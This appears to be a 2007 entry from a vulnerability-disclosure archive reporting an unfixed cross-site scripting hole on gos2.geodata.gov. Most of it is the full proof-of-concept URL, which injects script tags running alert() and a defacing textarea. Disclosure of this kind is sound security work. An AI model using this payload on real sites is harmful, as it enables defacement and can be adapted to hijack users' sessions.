Security researcher kaksii, has submitted on 02/11/2007 a cross-site-scripting (XSS) vulnerability affecting gos2.geodata.gov, which at the time of submission ranked 816639 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 02/11/2007 |
Date published: 05/11/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: kaksii |
Domain: gos2.geodata.gov |
Category: XSS |
Pagerank: 816639 |
|---|
URL: http://gos2.geodata.gov/wps/portal/gos/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKL9443cnIFSYGYfpb6kehCFgg
hb31fj_zcVP0A_YLc0IhyR0VFABDAZM0!/delta/base64xml/L3dJdyEvUUd3QndNQSEvNElVRS82X0xfSVE!?command=searc
h&what=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_w
as_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml
%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%252
0size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%
2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&where=%22%3E%3Cscrip
t%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscrip
t%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscrip
t%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextar
ea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextare
a%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E |
|
Click here to view the mirror
|
|
|
| 
